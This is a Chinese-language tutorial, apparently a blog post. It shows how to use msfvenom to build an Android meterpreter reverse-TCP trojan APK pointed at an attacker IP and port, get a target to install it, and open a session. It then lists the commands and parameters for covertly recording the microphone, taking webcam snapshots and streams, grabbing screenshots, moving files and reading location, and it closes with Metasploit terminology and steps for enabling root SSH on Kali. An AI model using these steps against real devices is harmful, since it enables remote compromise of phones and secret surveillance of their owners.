1.使用msf的msfveno模块生成安卓apk木马并制定攻击方IP与端口 ,存在temph目录下
image.png
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.17.190 lport=5555 R>/temph/a.apk
2.生成木马文件放到安卓端
image.png
3.执行监听,执行 当客户端执行点击apk文件 ,OK 上钩了
image.png
4.使用摄像头/录音
进行实时视频流
image.png
进行截屏
image.png
进行录音
image.png
等等一系列操作 列出如下指令:
record_mic 从默认麦克风录制音频 x 秒
record_mic 参数:
-h:显示帮助。
-d :记录的秒数,默认为 1 秒 (默认的 1 秒听不到啥,设置高了又会报错,在 Kali linux 测得 13 为最优秒数)
-F :wav 文件路径。默认为 HOME / [随机乱码名字] .wav
-p :自动播放捕获的音频,默认为“true”。
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_snap 参数:
-h:显示帮助
-i :要使用的网络摄像头的索引号。
-p :JPEG 图像文件路径。默认为 HOME / [随机乱码名字]
-q :JPEG 图像质量,默认为“50”。
-v :自动查看 JPEG 图像,默认为“true”
webcam_stream 从指定的网络摄像头播放视频流
4.文件上传下载
手机图片存的位置
image.png
5.图片文件搜索
image.png
下载
meterpreter > download desktop.ini
上传
meterpreter > upload /root/Downloads/1.jpeg /storage/emulated/0/DCIM/Camera
5.获取位置
image.png
渗透攻击(exploit) : 缓冲区溢出、Web应用程序漏洞攻击,以及利用配置错误等。
攻击载荷(payload):攻击载何是我们期望目标系统在被渗透攻击后而执行的代码
辅助模块 (auxiliary):主要包含渗透测试中一些辅助性的脚本,这些脚本功能有扫描,嗅探,破解,注入等
编码模块 (Encoders):各种编码工具 用于躲过入侵检测和过滤系统。
后续攻击模块 (Post) : 这个目录里放着msf 的exploits执行成功后,向目标机发送的一些功能性指令比如:提权,获取hash等。
kail Windows10 远程连接解决办法
第一步:开启kail 远程ssh,开启办法如下:
1、配置SSH参数
修改sshd_config文件,命令为:vi /etc/ssh/sshd_config
将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes
将PermitRootLogin without-password修改为PermitRootLogin yes
然后,保存,退出vi
第二步:启动SSH服务
命令为:
/etc/init.d/ssh start
或者
service ssh start
查看SSH服务状态是否正常运行,命令为:
/etc/init.d/ssh status
或者
service ssh status
第三步:设置系统自动启动SSH服务
update-rc.d ssh enable //系统自动启动SSH服务
update-rc.d ssh disabled // 关闭系统自动启动SSH服务
防火墙相关,若没进行安装 apt-get install ufw
image.png
网友评论